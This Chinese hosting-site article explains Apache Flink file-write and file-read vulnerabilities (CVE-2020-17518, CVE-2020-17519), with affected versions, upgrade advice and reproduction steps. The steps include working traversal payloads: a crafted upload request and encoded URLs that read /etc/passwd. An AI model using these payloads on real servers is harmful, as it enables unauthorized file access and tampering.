新西兰服务器

Apache Flink的文件漏洞是怎样的


Apache Flink的文件漏洞是怎样的

发布时间:2021-12-28 20:11:40 来源:高防服务器网 阅读:93 作者:柒染 栏目:安全技术

这篇文章给大家介绍Apache Flink的文件漏洞是怎样的,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。

Apache Flink文件漏洞

一、漏洞描述

Apache Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,导致目录遍历。

CVE-2020-17518: 文件写入漏洞

攻击者利用REST API,可以修改HTTP头,将上传的文件写入到本地文件系统上的任意位置(Flink 1.5.1进程能访问到的)。

CVE-2020-17519: 文件读取漏洞

Apache Flink 1.11.0 允许攻击者通过JobManager进程的REST API读取JobManager本地文件系统上的任何文件(JobManager进程能访问到的) 。

二、影响版本

Apache Flink 1.5.1 ~ 1.11.2

三、漏洞复现

环境地址:

https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518

1、CVE-2020-17518: 文件写入漏洞

POST/jars/uploadHTTP/1.1Host: IP:8081Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Connection: closeContent-Type: multipart/form-data; boundary=—-WebKitFormBoundaryoZ8meKnrrso89R6YContent-Length: 189——WebKitFormBoundaryoZ8meKnrrso89R6YContent-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/sucess"success——WebKitFormBoundaryoZ8meKnrrso89R6Y–

访问:文件写入成功

http://ip+port/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fsucess

2、CVE-2020-17519: 文件读取漏洞

http://IP:PORT/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

访问路径获取passwd

四、修复建议

所有用户升级到Flink 1.11.3或1.12.0,下载链接为:

https://flink.apache.org/downloads.html

https://flink.apache.org/downloads.html

关于Apache Flink的文件漏洞是怎样的就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。

[微信提示:高防服务器能助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。

[图文来源于网络,不代表本站立场,如有侵权,请联系高防服务器网删除]
[